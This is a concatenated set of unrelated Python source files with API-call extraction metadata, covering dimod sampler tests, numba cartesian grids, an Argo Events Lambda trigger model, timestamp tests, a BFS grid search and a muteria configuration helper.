print('Sequential took: %.2f seconds.' % (timer() - start))
# concurrent
def concurrent_f(x):
global result
result = f(result)
result = 3
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as exector:
futures = [exector.submit(concurrent_f, i) for i in range(20)]
_ = concurrent.futures.as_completed(futures)
print('Result is very large. Only printing the last 5 digits:', result % 100000)
print('Concurrent took: %.2f seconds.' % (timer() - start))
|
[
"timeit.default_timer"
] |
[((146, 153), 'timeit.default_timer', 'timer', ([], {}), '()\n', (151, 153), True, 'from timeit import default_timer as timer\n'), ((332, 339), 'timeit.default_timer', 'timer', ([], {}), '()\n', (337, 339), True, 'from timeit import default_timer as timer\n'), ((752, 759), 'timeit.default_timer', 'timer', ([], {}), '()\n', (757, 759), True, 'from timeit import default_timer as timer\n')]
|
# Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
import unittest
import itertools
import dimod
class TestStructuredClass(unittest.TestCase):
def test_instantiation_base_class(self):
with self.assertRaises(TypeError):
dimod.Structured()
def test_adjacency_property(self):
class Dummy(dimod.Structured):
@property
def nodelist(self):
return list(range(5))
@property
def edgelist(self):
return list(itertools.combinations(self.nodelist, 2))
sampler = Dummy()
for u, v in sampler.edgelist:
self.assertIn(u, sampler.adjacency[v])
self.assertIn(v, sampler.adjacency[u])
for u in sampler.adjacency:
for v in sampler.adjacency[u]:
self.assertTrue((u, v) in sampler.edgelist or (v, u) in sampler.edgelist)
# check that we are not rebuilding each time
self.assertIs(sampler.adjacency, sampler.adjacency)
def test_structured_property(self):
class Dummy(dimod.Structured):
@property
def nodelist(self):
return [0, 1]
@property
def edgelist(self):
return [(0, 1)]
sampler = Dummy()
self.assertEqual(sampler.structure.nodelist, [0, 1])
self.assertEqual(sampler.structure.edgelist, [(0, 1)])
self.assertEqual(sampler.structure.adjacency, {0: {1}, 1: {0}})
def test_networkx_graph(self):
try:
import networkx as nx
except ImportError:
raise self.skipTest("No NetworkX installed.")
# Create simple NetworkX graph to compare to
nxG = nx.Graph()
for i in range(5):
nxG.add_node(i)
nxG.add_edge(0,1)
nxG.add_edge(1,2)
nxG.add_edge(2,3)
# Create NetworkX graph from structured sampler
class Dummy(dimod.Structured):
@property
def nodelist(self):
return list(range(5))
@property
def edgelist(self):
return [(0,1),(1,2),(2,3)]
sampler = Dummy()
G = sampler.to_networkx_graph()
self.assertEqual(set(nxG), set(G))
for u, v in nxG.edges:
self.assertIn(u, G[v])
|
[
"itertools.combinations",
"dimod.Structured",
"networkx.Graph"
] |
[((2393, 2403), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (2401, 2403), True, 'import networkx as nx\n'), ((907, 925), 'dimod.Structured', 'dimod.Structured', ([], {}), '()\n', (923, 925), False, 'import dimod\n'), ((1180, 1220), 'itertools.combinations', 'itertools.combinations', (['self.nodelist', '(2)'], {}), '(self.nodelist, 2)\n', (1202, 1220), False, 'import itertools\n')]
|
"""
Filename: cartesian.py
Authors: <NAME>
Implements cartesian products and regular cartesian grids.
"""
import numpy
from numba import njit
def cartesian(nodes, order="C"):
"""Cartesian product of a list of arrays
Parameters:
-----------
nodes: (list of 1d-arrays)
order: ('C' or 'F') order in which the product is enumerated
Returns:
--------
out: (2d-array) each line corresponds to one point of the product space
"""
nodes = [numpy.array(e) for e in nodes]
shapes = [e.shape[0] for e in nodes]
n = len(nodes)
l = numpy.prod(shapes)
out = numpy.zeros((l, n))
if order == "C":
repetitions = numpy.cumprod([1] + shapes[:-1])
else:
shapes.reverse()
sh = [1] + shapes[:-1]
repetitions = numpy.cumprod(sh)
repetitions = repetitions.tolist()
repetitions.reverse()
for i in range(n):
_repeat_1d(nodes[i], repetitions[i], out[:, i])
return out
def mlinspace(a, b, nums, order="C"):
"""Constructs a regular cartesian grid
Parameters:
-----------
a: (1d-array) lower bounds in each dimension
b: (1d-array) upper bounds in each dimension
nums: (1d-array) number of nodes along each dimension
order: ('C' or 'F') order in which the product is enumerated
Returns:
--------
out: (2d-array) each line corresponds to one point of the product space
"""
a = numpy.array(a, dtype="float64")
b = numpy.array(b, dtype="float64")
nums = numpy.array(nums, dtype="int64")
nodes = [numpy.linspace(a[i], b[i], nums[i]) for i in range(len(nums))]
return cartesian(nodes, order=order)
@njit(cache=True)
def _repeat_1d(x, K, out):
"""Repeats each element of a vector many times and repeats the whole result many times
Parameters
----------
x: (1d array) vector to be repeated
K: (int) number of times each element of x is repeated (inner iterations)
out: (1d array) placeholder for the result
Returns
-------
None
"""
N = x.shape[0]
L = out.shape[0] // (K * N) # number of outer iterations
# K # number of inner iterations
# the result out should enumerate in C-order the elements
# of a 3-dimensional array T of dimensions (K,N,L)
# such that for all k,n,l, we have T[k,n,l] == x[n]
for n in range(N):
val = x[n]
for k in range(K):
for l in range(L):
ind = k * N * L + n * L + l
out[ind] = val
|
[
"numpy.cumprod",
"numba.njit",
"numpy.zeros",
"numpy.array",
"numpy.linspace",
"numpy.prod"
] |
[((1674, 1690), 'numba.njit', 'njit', ([], {'cache': '(True)'}), '(cache=True)\n', (1678, 1690), False, 'from numba import njit\n'), ((579, 597), 'numpy.prod', 'numpy.prod', (['shapes'], {}), '(shapes)\n', (589, 597), False, 'import numpy\n'), ((608, 627), 'numpy.zeros', 'numpy.zeros', (['(l, n)'], {}), '((l, n))\n', (619, 627), False, 'import numpy\n'), ((1437, 1468), 'numpy.array', 'numpy.array', (['a'], {'dtype': '"""float64"""'}), "(a, dtype='float64')\n", (1448, 1468), False, 'import numpy\n'), ((1477, 1508), 'numpy.array', 'numpy.array', (['b'], {'dtype': '"""float64"""'}), "(b, dtype='float64')\n", (1488, 1508), False, 'import numpy\n'), ((1520, 1552), 'numpy.array', 'numpy.array', (['nums'], {'dtype': '"""int64"""'}), "(nums, dtype='int64')\n", (1531, 1552), False, 'import numpy\n'), ((479, 493), 'numpy.array', 'numpy.array', (['e'], {}), '(e)\n', (490, 493), False, 'import numpy\n'), ((672, 704), 'numpy.cumprod', 'numpy.cumprod', (['([1] + shapes[:-1])'], {}), '([1] + shapes[:-1])\n', (685, 704), False, 'import numpy\n'), ((793, 810), 'numpy.cumprod', 'numpy.cumprod', (['sh'], {}), '(sh)\n', (806, 810), False, 'import numpy\n'), ((1566, 1601), 'numpy.linspace', 'numpy.linspace', (['a[i]', 'b[i]', 'nums[i]'], {}), '(a[i], b[i], nums[i])\n', (1580, 1601), False, 'import numpy\n')]
|
import pandas as pd
from random_forest.forest import Forest
def load():
df = pd.read_csv('../refrigerator_temp_time_series.csv')
df['temp'] = df['temp'].apply(lambda x: x.replace(',', '.')).astype(
'float64')
df['Ts'] = df['Ts'].apply(lambda x: x.replace(',', '.')).astype('float64')
df.rename(
columns={
"czas(min)": "time",
"alpha": "compressor",
"temp": 'ambient_temp',
"Ts": 'refrigerator_temp'},
inplace=True)
df.set_index('time', inplace=True)
return df
def delay(df, delay):
frames = [df.shift(-t) for t in range(delay)]
frames.append(df.iloc[:, -1:].diff().shift(-delay))
delayed_df = pd.concat(frames, axis=1).dropna()
return delayed_df
def test(df, iterations, data_to_test='fresh_data'):
prediction_err_sum = 0
naive_err_sum = 0
for _ in range(iterations):
fresh_data = df.sample(df.shape[0]//10)
training_data = df[~df.index.isin(fresh_data.index)]
forest = Forest(training_data)
if data_to_test == 'test_data':
test_data = fresh_data
else:
test_data = training_data
for test in test_data.values:
previous_temp = test[-2]
actual_value = previous_temp + test[-1]
prediction_err_sum += abs(
(forest.predict(test[:-1]) + previous_temp - actual_value) /
actual_value if actual_value else 0)
naive_err_sum += abs((previous_temp - actual_value) /
actual_value if actual_value else 0)
return naive_err_sum, prediction_err_sum, test_data.shape[0]
|
[
"pandas.read_csv",
"pandas.concat",
"random_forest.forest.Forest"
] |
[((83, 134), 'pandas.read_csv', 'pd.read_csv', (['"""../refrigerator_temp_time_series.csv"""'], {}), "('../refrigerator_temp_time_series.csv')\n", (94, 134), True, 'import pandas as pd\n'), ((1026, 1047), 'random_forest.forest.Forest', 'Forest', (['training_data'], {}), '(training_data)\n', (1032, 1047), False, 'from random_forest.forest import Forest\n'), ((705, 730), 'pandas.concat', 'pd.concat', (['frames'], {'axis': '(1)'}), '(frames, axis=1)\n', (714, 730), True, 'import pandas as pd\n')]
|
# coding: utf-8
"""
Argo Events
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argo.events.client.configuration import Configuration
class V1alpha1AWSLambdaTrigger(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'access_key': 'V1SecretKeySelector',
'function_name': 'str',
'parameters': 'list[V1alpha1TriggerParameter]',
'payload': 'list[V1alpha1TriggerParameter]',
'region': 'str',
'secret_key': 'V1SecretKeySelector'
}
attribute_map = {
'access_key': 'accessKey',
'function_name': 'functionName',
'parameters': 'parameters',
'payload': 'payload',
'region': 'region',
'secret_key': 'secretKey'
}
def __init__(self, access_key=None, function_name=None, parameters=None, payload=None, region=None, secret_key=None, local_vars_configuration=None): # noqa: E501
"""V1alpha1AWSLambdaTrigger - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._access_key = None
self._function_name = None
self._parameters = None
self._payload = None
self._region = None
self._secret_key = None
self.discriminator = None
if access_key is not None:
self.access_key = access_key
self.function_name = function_name
if parameters is not None:
self.parameters = parameters
self.payload = payload
self.region = region
if secret_key is not None:
self.secret_key = secret_key
@property
def access_key(self):
"""Gets the access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: V1SecretKeySelector
"""
return self._access_key
@access_key.setter
def access_key(self, access_key):
"""Sets the access_key of this V1alpha1AWSLambdaTrigger.
:param access_key: The access_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: V1SecretKeySelector
"""
self._access_key = access_key
@property
def function_name(self):
"""Gets the function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
FunctionName refers to the name of the function to invoke. # noqa: E501
:return: The function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: str
"""
return self._function_name
@function_name.setter
def function_name(self, function_name):
"""Sets the function_name of this V1alpha1AWSLambdaTrigger.
FunctionName refers to the name of the function to invoke. # noqa: E501
:param function_name: The function_name of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and function_name is None: # noqa: E501
raise ValueError("Invalid value for `function_name`, must not be `None`") # noqa: E501
self._function_name = function_name
@property
def parameters(self):
"""Gets the parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: list[V1alpha1TriggerParameter]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this V1alpha1AWSLambdaTrigger.
:param parameters: The parameters of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: list[V1alpha1TriggerParameter]
"""
self._parameters = parameters
@property
def payload(self):
"""Gets the payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: list[V1alpha1TriggerParameter]
"""
return self._payload
@payload.setter
def payload(self, payload):
"""Sets the payload of this V1alpha1AWSLambdaTrigger.
:param payload: The payload of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: list[V1alpha1TriggerParameter]
"""
if self.local_vars_configuration.client_side_validation and payload is None: # noqa: E501
raise ValueError("Invalid value for `payload`, must not be `None`") # noqa: E501
self._payload = payload
@property
def region(self):
"""Gets the region of this V1alpha1AWSLambdaTrigger. # noqa: E501
Region is AWS region # noqa: E501
:return: The region of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: str
"""
return self._region
@region.setter
def region(self, region):
"""Sets the region of this V1alpha1AWSLambdaTrigger.
Region is AWS region # noqa: E501
:param region: The region of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and region is None: # noqa: E501
raise ValueError("Invalid value for `region`, must not be `None`") # noqa: E501
self._region = region
@property
def secret_key(self):
"""Gets the secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:return: The secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:rtype: V1SecretKeySelector
"""
return self._secret_key
@secret_key.setter
def secret_key(self, secret_key):
"""Sets the secret_key of this V1alpha1AWSLambdaTrigger.
:param secret_key: The secret_key of this V1alpha1AWSLambdaTrigger. # noqa: E501
:type: V1SecretKeySelector
"""
self._secret_key = secret_key
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1AWSLambdaTrigger):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha1AWSLambdaTrigger):
return True
return self.to_dict() != other.to_dict()
|
[
"argo.events.client.configuration.Configuration",
"six.iteritems"
] |
[((6737, 6770), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (6750, 6770), False, 'import six\n'), ((1689, 1704), 'argo.events.client.configuration.Configuration', 'Configuration', ([], {}), '()\n', (1702, 1704), False, 'from argo.events.client.configuration import Configuration\n')]
|
from __future__ import print_function
from builtins import str
from builtins import object
import sys, os
sys.path.append(os.path.dirname(os.getcwd()))
from moments.timestamp import *
def test_time():
s = "*2008.10.22 11:15:42 suffix remainder here"
(ts, remainder) = parse_line_for_time(s)
assert ts == "*2008.10.22 11:15:42"
t = Timestamp(tstamp=ts)
t2 = datetime(2008, 10, 22, 11, 15, 42)
assert t.datetime == t2
t = Timestamp(tstamp="*2008.10.22 11:15")
t2 = datetime(2008, 10, 22, 11, 15)
assert t.datetime == t2
class TestTimestamp(object):
def setUp(self):
self.ts = Timestamp("20110707")
def test_init(self):
#make sure it loads
ts = Timestamp("20090210")
assert ts.compact() == "20090210"
def test_dupe_init(self):
dupe_ts = Timestamp(self.ts)
print(self.ts.dt)
print(isinstance(self.ts, Timestamp))
print(dupe_ts.dt)
assert dupe_ts.dt == self.ts.dt
def test_months(self):
now = Timestamp()
assert str(now.future_month(0)) == str(now.past_month(0))
class TestTimerange(object):
def setUp(self):
tstamp = "20081218210057"
self.tr = Timerange(tstamp)
#self.now = datetime.now()
self.now = Timestamp()
def test_init(self):
(start, end) = self.tr.as_tuple()
t = datetime(2008, 12, 18, 21, 0, 57)
assert start.datetime == t
#print end.datetime
#print self.now
assert end.compact() == self.now.compact()
def test_str(self):
tstamp = "20081218"
tr = Timerange(tstamp)
print(str(tr))
#assert str(tr) == "20081218-20081219"
assert str(tr) == "20081218-20081218235959"
tstamp = "20081231"
tr = Timerange(tstamp)
#assert str(tr) == "20081231-20090101"
assert str(tr) == "20081231-20081231235959"
def test_from_trange(self):
tstamp = "20081218"
(start, end) = Timerange('').from_text(tstamp)
#bit kludgy here... probably a better way to test for types
#assert str(type(start.datetime)) == "<type 'datetime.datetime'>"
#assert str(type(end.datetime)) == "<type 'datetime.datetime'>"
assert isinstance(start.datetime, datetime)
assert isinstance(end.datetime, datetime)
class TestRelativeRange(object):
def setUp(self):
tstamp = "20081218210057"
self.tr = Timerange(tstamp)
self.timerange = Timerange('20100428-20100528')
#june 2, 2010 is a Wednesday:
tstamp = Timestamp(compact="20100602")
#print tstamp
#self.rr = RelativeRange(tstamp)
self.rr = Timerange(tstamp)
print(self.rr)
#december 1, 2010 is a Wednesday:
self.dec = Timestamp(compact='201012')
#self.rr_dec = RelativeRange(self.dec)
self.rr_dec = Timerange(self.dec)
def test_year(self):
print(str(self.rr))
print(self.rr.year())
assert str(self.rr.year()) == "2010-20101231235959"
def test_month(self):
feb = Timestamp(compact='201002')
dec_r = self.rr.month(self.dec)
feb_r = self.rr.month(feb)
assert str(dec_r) == "20101201-20101231235959"
assert str(feb_r) == "20100201-20100228235959"
nov_r = self.rr_dec.last_month()
print(nov_r)
assert str(nov_r) == "20101101-20101130235959"
this_month_r = self.rr_dec.this_month()
assert str(this_month_r) == "20101201-20101231235959"
next_month_r = self.rr_dec.next_month()
assert str(next_month_r) == "20110101-20110131235959"
def test_week(self):
week = self.rr.week()
print(week)
#dec 1, 2010 is wednesday, starting week on friday
#to test opposite direction
week = self.rr_dec.week(week_start=4)
print(week)
assert str(week) == "20101126-20101202235959"
week = self.rr.week()
assert str(week) == "20100531-20100606235959"
#assert False
def test_day(self):
day = self.rr.day()
print(day)
assert str(day) == "20100602-20100602235959"
## def test_this_week_last_year():
## now = datetime.now()
## year = timedelta(365)
## last_year = now - year
## start = last_year - timedelta(4)
## end = last_year + timedelta(4)
## stamp = start.strftime("%Y%m%d") + '-' + end.strftime("%Y%m%d")
## print this_week_last_year()
## assert stamp == this_week_last_year()
|
[
"os.getcwd",
"builtins.str"
] |
[((138, 149), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (147, 149), False, 'import sys, os\n'), ((1656, 1663), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1659, 1663), False, 'from builtins import str\n'), ((1727, 1734), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1730, 1734), False, 'from builtins import str\n'), ((1885, 1892), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1888, 1892), False, 'from builtins import str\n'), ((2979, 2991), 'builtins.str', 'str', (['self.rr'], {}), '(self.rr)\n', (2982, 2991), False, 'from builtins import str\n'), ((3242, 3252), 'builtins.str', 'str', (['dec_r'], {}), '(dec_r)\n', (3245, 3252), False, 'from builtins import str\n'), ((3297, 3307), 'builtins.str', 'str', (['feb_r'], {}), '(feb_r)\n', (3300, 3307), False, 'from builtins import str\n'), ((3415, 3425), 'builtins.str', 'str', (['nov_r'], {}), '(nov_r)\n', (3418, 3425), False, 'from builtins import str\n'), ((3527, 3544), 'builtins.str', 'str', (['this_month_r'], {}), '(this_month_r)\n', (3530, 3544), False, 'from builtins import str\n'), ((3638, 3655), 'builtins.str', 'str', (['next_month_r'], {}), '(next_month_r)\n', (3641, 3655), False, 'from builtins import str\n'), ((3938, 3947), 'builtins.str', 'str', (['week'], {}), '(week)\n', (3941, 3947), False, 'from builtins import str\n'), ((4023, 4032), 'builtins.str', 'str', (['week'], {}), '(week)\n', (4026, 4032), False, 'from builtins import str\n'), ((4171, 4179), 'builtins.str', 'str', (['day'], {}), '(day)\n', (4174, 4179), False, 'from builtins import str\n')]
|
import structures
import Point
def get_adj(grid, cur, checked):
adj_list = []
# Checks down
if cur.x < len(grid[0])-1:
down = Point.Point(cur.x+1, cur.y)
if down not in checked:
adj_list.append(down)
# Checks right
if cur.y < len(grid)-1:
right = Point.Point(cur.x, cur.y+1)
if right not in checked:
adj_list.append(right)
# Checks left
# if cur.x > 0:
# left = Point.Point(cur.x-1, cur.y)
# if left not in checked:
# adj_list.append(left)
# if grid[cur.x][cur.y+1] == '0':
# adj_list.append(cur)
return adj_list
def bfs(grid, start, target):
# print(start)
# print(target)
q = structures.Queue()
checked = structures.Set()
checked.add(start)
q.push(start)
while q:
cur = q.pop()
q.push_list(get_adj(grid, cur, checked))
for pnt in q:
checked.add(pnt)
print(q)
print(cur)
grid[cur.y][cur.x] = 'X'
for line in grid:
for cell in line:
print(cell, end=' ')
print()
return grid
if __name__ == '__main__':
grid = [
['S','0','0', '0'],
['0','0','0', '0'],
['0','0','0', '0'],
['0','0','0', '0'],
['0','0', '0','F']
]
s = Point.Point()
f = Point.Point(len(grid)-1, len(grid[0])-1)
bfs(grid, s, f)
|
[
"structures.Set",
"Point.Point",
"structures.Queue"
] |
[((636, 654), 'structures.Queue', 'structures.Queue', ([], {}), '()\n', (652, 654), False, 'import structures\n'), ((666, 682), 'structures.Set', 'structures.Set', ([], {}), '()\n', (680, 682), False, 'import structures\n'), ((1141, 1154), 'Point.Point', 'Point.Point', ([], {}), '()\n', (1152, 1154), False, 'import Point\n'), ((135, 164), 'Point.Point', 'Point.Point', (['(cur.x + 1)', 'cur.y'], {}), '(cur.x + 1, cur.y)\n', (146, 164), False, 'import Point\n'), ((271, 300), 'Point.Point', 'Point.Point', (['cur.x', '(cur.y + 1)'], {}), '(cur.x, cur.y + 1)\n', (282, 300), False, 'import Point\n')]
|
"""
Note: The raw configuration is a configuration that has the exact
same representation as in the file but loaded in memory as a dict.
(Example: module given in file still have the filename or function
given as string to be evaluated are also still string).
But the final conf has everything loaded and ready to use
"""
from __future__ import print_function
import os
import sys
import argparse
import logging
import importlib
import copy
import muteria.common.mix as common_mix
import muteria.drivers.criteria as criteria
import muteria.drivers.testgeneration as testgeneration
import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as \
crit_opt_module
from muteria.drivers.optimizers.criteriatestexecution\
.base_criteria_test_execution_optimizer \
import BaseCriteriaTestExecutionOptimizer
import muteria.configmanager.configurations as configurations
from muteria.configmanager.configurations import CompleteConfiguration
from muteria.configmanager.configurations import ConfigElement
import muteria.controller.checkpoint_tasks as checkpoint_tasks
ERROR_HANDLER = common_mix.ErrorHandler
class ConfigurationHelper(object):
@classmethod
def _get_available_default_raw_conf_by_language(cls, languages):
res = {}
for lang in languages:
res[lang] = cls._get_default_raw_conf(lang)
return res
#~ def _get_available_default_raw_conf_by_language()
@classmethod
def _get_default_raw_conf(cls, language):
config_default = "muteria.configmanager.defaults"
# Get common default conf
com_default_conf = cls._load_raw_conf_from_file(\
module_str=".".join([config_default, 'common_defaults']),\
info="common config module", \
must_exist=True)
ERROR_HANDLER.assert_true(com_default_conf is not None, \
'invalid for comm', __file__)
# Get language specific default conf
lang_default_conf = cls._load_raw_conf_from_file(\
module_str=".".join([config_default, 'languages', language]),\
info="language "+language+" config module",\
must_exist=False)
# create an object that is an update of common_default_conf by
# lang_default_conf
com_conf_dict = cls._get_object_params_vals_as_dict(com_default_conf)
if lang_default_conf is None:
lang_conf_dict = {}
else:
lang_conf_dict = \
cls._get_object_params_vals_as_dict(lang_default_conf)
## Make sure default has all parameters
c_tmp = cls._get_object_params_vals_as_dict(CompleteConfiguration)
useless = set(com_conf_dict) - set(c_tmp)
ERROR_HANDLER.assert_true(\
len(useless) + len(c_tmp) == len(com_conf_dict),\
"Some Configs params not in common default", __file__)
# get result
## remove irrelevant
for u in useless:
del com_conf_dict[u]
## update
res = cls._get_update_left_with_right_raw_conf(com_conf_dict,\
lang_conf_dict, same_key=False)
return res
#~ def _get_default_raw_conf()
@staticmethod
def _get_object_params_vals_as_dict(obj):
""" Get all fields of obj that are not hidden
"""
res = {}
for param, val in list(vars(obj).items()):
if param.startswith('_'):
continue
res[param] = val
return res
#~ def _get_object_params_vals_as_dict()
@staticmethod
def _load_raw_conf_from_file(module_str, info="module", must_exist=True):
res = None
try:
res = importlib.import_module(module_str)
except ImportError as ie:
if must_exist:
ERROR_HANDLER.error_exit("{} {} {}. \n {}.".format(\
"Failed to load", info, module_str, str(ie)), \
__file__)
except SyntaxError as se:
ERROR_HANDLER.error_exit("{} {} {}. \n {}.".format(\
"Syntax error in", info, module_str, str(se)), \
__file__)
return res
#~ def _load_raw_conf_from_file()
@classmethod
def _get_update_rawconf_with_file(cls, raw_conf, raw_conf_filename):
"""
load config from file and update raw conf with its contents
"""
path, filename = os.path.split(os.path.normpath(\
os.path.abspath(raw_conf_filename)))
if path:
sys.path.insert(0, path)
ERROR_HANDLER.assert_true(filename.endswith('.py'), "{}{}{}".format(\
"invalid conf file (", filename, \
"). must be python source file"), __file__)
mod_name = filename[:-len('.py')]
fconf = cls._load_raw_conf_from_file(mod_name, info="conf file", \
must_exist=True)
if path:
ERROR_HANDLER.assert_true(sys.path[0] == path, "BUG", __file__)
sys.path.pop(0)
if fconf is None:
fconf_dict = {}
else:
fconf_dict = cls._get_object_params_vals_as_dict(fconf)
# update
res = cls._get_update_left_with_right_raw_conf(raw_conf, fconf_dict,\
same_key=False)
return res
#~ def _get_update_rawconf_with_file()
@staticmethod
def _get_update_left_with_right_raw_conf(left, right, same_key=True):
""" Update the keys of left with the corresponding keys in right
into a new dict and return it.
"""
if same_key:
ERROR_HANDLER.assert_true(set(left) == set(right), \
"different keys", __file__)
res = dict(left)
for k, v in list(right.items()):
if k in res:
res[k] = v
return res
#~ def _get_update_left_with_right_raw_conf()
@classmethod
def _make_conf_class_from_dict(cls, dict_obj):
cc = CompleteConfiguration()
if set(dict_obj) != set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration)):
in_obj_only = set(dict_obj) - \
set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration))
final_templ_only = set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration)) - set(dict_obj)
ERROR_HANDLER.error_exit("config missmatch: {} {}. {} {}".format(\
"in_obj_only", in_obj_only,
"final template only", final_templ_only), __file__)
for k, v in list(dict_obj.items()):
setattr(cc, k, v)
return cc
#~ def _make_conf_class_from_dict()
@staticmethod
def _make_tool_conf_from_raw(raw_dict_conf, tool_type_enum,
default_tool_type, target_tool_class):
tuc = 'tool_user_custom'
ttype = 'tooltype'
c_on = 'criteria_on'
if ttype in raw_dict_conf:
if raw_dict_conf[ttype]:
ERROR_HANDLER.assert_true(\
hasattr(tool_type_enum, raw_dict_conf[ttype]), \
"Invalid test tool type: "+raw_dict_conf[ttype], \
__file__)
raw_dict_conf[ttype] = \
getattr(tool_type_enum, raw_dict_conf[ttype])
else:
raw_dict_conf[ttype] = default_tool_type
if c_on in raw_dict_conf:
if raw_dict_conf[c_on]:
raw_dict_conf[c_on] = [getattr(criteria.TestCriteria, c) \
for c in raw_dict_conf[c_on]]
else:
raw_dict_conf[c_on] = None
if tuc in raw_dict_conf:
if raw_dict_conf[tuc]:
raw_dict_conf[tuc] = \
configurations.ToolUserCustom(**raw_dict_conf[tuc])
else:
raw_dict_conf[tuc] = None
return target_tool_class(**raw_dict_conf)
#~ def _make_tool_conf_from_raw()
@classmethod
def get_extend_file_raw_conf(cls, raw_conf_file, language):
""" Take a raw conf file that might not have all the parameters and
load, then add the missing with default value into a new
returned raw conf
"""
def_conf = cls._get_default_raw_conf(language)
res = cls._get_update_rawconf_with_file(def_conf, raw_conf_file)
return res
#~ def get_extend_file_raw_conf()
@classmethod
def get_extend_raw_conf(cls, raw_conf, language):
""" Take a raw conf that might not have all the parameters and
add the missing with default value into a new returned raw conf
"""
def_conf = cls._get_default_raw_conf(language)
res = cls._get_update_left_with_right_raw_conf(def_conf, raw_conf, \
same_key=False)
return res
#~ def get_extend_raw_conf()
@classmethod
def get_finalconf_from_rawconf(cls, raw_conf):
""" Transform a raw conf into final conf
TODO: Verify config consistency
"""
conf = cls._make_conf_class_from_dict(raw_conf)
if conf.ENABLED_CRITERIA is None:
conf.ENABLED_CRITERIA = \
copy.deepcopy(conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA)
tmp = []
for c in conf.ENABLED_CRITERIA:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion: "+c)
c = criteria.TestCriteria[c]
tmp.append(c)
conf.ENABLED_CRITERIA = tmp
tmp = []
for c in conf.CRITERIA_WITH_OUTPUT_SUMMARY:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in out sum: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.append(c)
conf.CRITERIA_WITH_OUTPUT_SUMMARY = tmp
if conf.CRITERIA_SEQUENCE is None:
conf.CRITERIA_SEQUENCE = copy.deepcopy(criteria.CRITERIA_SEQUENCE)
for pos, group in enumerate(conf.CRITERIA_SEQUENCE):
tmp = set()
for c in group:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in seq: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.add(c)
conf.CRITERIA_SEQUENCE[pos] = tmp
if conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM is None:
conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM = copy.deepcopy(\
criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM)
tmp = []
for c in conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in outdiff: "+c, __file__)
